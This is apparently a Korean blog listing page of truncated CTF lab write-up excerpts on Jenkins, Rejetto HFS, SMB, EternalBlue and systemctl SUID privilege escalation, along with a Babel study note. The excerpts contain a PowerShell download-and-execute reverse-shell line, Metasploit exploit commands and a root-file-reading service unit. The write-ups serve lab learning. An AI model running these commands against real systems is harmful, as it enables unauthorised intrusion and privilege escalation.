TASK 1 Initial Access 1. Jenkins 포트번호 8080 접속, Jenkins 로그인 화면 확인 무차별대입으로 로그인 2. Execute shell Jenkins는 빌드 시 특정 쉘 스크립트가 실행되도록 하는 기능이 있는 듯. 찾아보니까 project > Build > Execute shell THM 지시대로 command에 쉘 스크립트 작성 Invoke-PowerShellTcp.ps1는 여기에서 다운받을 수 있음. powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress y..

TASK 1 nmap 80번 포트 열린 것 확인, 웹 페이지 접속 이름 확인. TASK 2 Initial Access 80 이외에 8080도 웹 서버 실행하고 있음 해당 웹서버는 Rejetto Http File Server임 2.3 버전에 CVE-2014-6287 취약점이 존재한다. (링크) 간단히 설명하자면, 검색 기능에서 %00를 이용하여 임의 프로그램을 실행할 수 있는 취약점임. metasploit 통해 exploit 해보자. 1. 모듈 2. use exploit/windows/http/rejetto_hfs_exec show options # 필수 옵션 셋팅 set RHOSTS {target ip} set RPORT {tartget port} set SRVHOST 0.0.0.0 set SRVPORT..

TASK 2-3. 침투 0. port scan 1. Samba Windows의 SMB 프로토콜을 구현하여 파일 및 프린터 공유를 가능하게 함 * 대부분의 Linux 배포판에 smbclient가 설치되어 있음 1) nmap nmap -p {port: 445 or 139} --script=smb-enum-shares.nse,smb-enum-users.nse {ip} *smb-enum-shares.nse : Samba 서버에서 공유된 디렉터리(Shares)를 열거 *smb-enum-users.nse : Samba 서버에 등록된 사용자 계정 열거 2) smbclient smbclient -R smb://{ip}/{user} # -R : recursive mode, 원격 서버의 모든 디렉터리 및 하위 디렉터리를 ..

보호되어 있는 글입니다.

Task 1 - 타겟은 ms 관련 취약점을 가지고 있음 - site:https://learn.microsoft.com/en-us/security-updates/securitybulletins/ windows7 445 - MS17-010 취약점 (링크) Task 2 msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhosts set payload windows/x64/shell/reverse_tcp exploit Task 3 1) meterpreter shell 진입 - 백그라운드 전환 (ctrl + z), background sesions 1 - meterpreter shell로 진입하기 위해 shell_to_meterpreter 이용 use p..

Task 5. Privilege Escalation - SUID를 이용한 권한 상승 - systemctl 이용 나는 systemctl를 서비스 시작/정지 작업을 위한 유틸리티로만 알고 있었는데, 다른 기능도 있더라. systemctl 통해서 시스템 부팅 시 특정 서비스가 자동으로 시작하도록 설정할 수 있다. 마침 오늘 오전에 centOS tomcat 구축하며 알았다. 이 경험이 아니었으면 한참 더 헤맸을 듯 하다. 아무튼, 이를 이용하여 flag를 얻어보자. 1. pe.service [Unit] Description=pe to root [Service] ExecStart=/bin/bash -c 'cat /root/root.txt > flag.txt' [Install] WantedBy=multi-user...

보호되어 있는 글입니다.

2023.04.09 자바스크립트 스터디 12회차 공부 사이트: https://poiemaweb.com/ 13. Babel 1) 정의 Babel은 최신 사양의 자바스크립트 코드를 IE나 구형 브라우저에서도 동작하는 ES5 이하의 코드로 변환시킬 수 있는 트랜스파일러(Transpiler)이다. 2) 설치 npm을 이용한 Babel CLI 설치 과정 (로컬 설치 권장) // 1. 디렉터리 생성 mkdir ... // 2. package.json 생성 npm init -y // 3. babel-core, babel-cli 설치 npm install --save-dev @babel/core @babel/cli // 4. Babel 프리셋 설치 npm install --save-dev @babel/preset-en..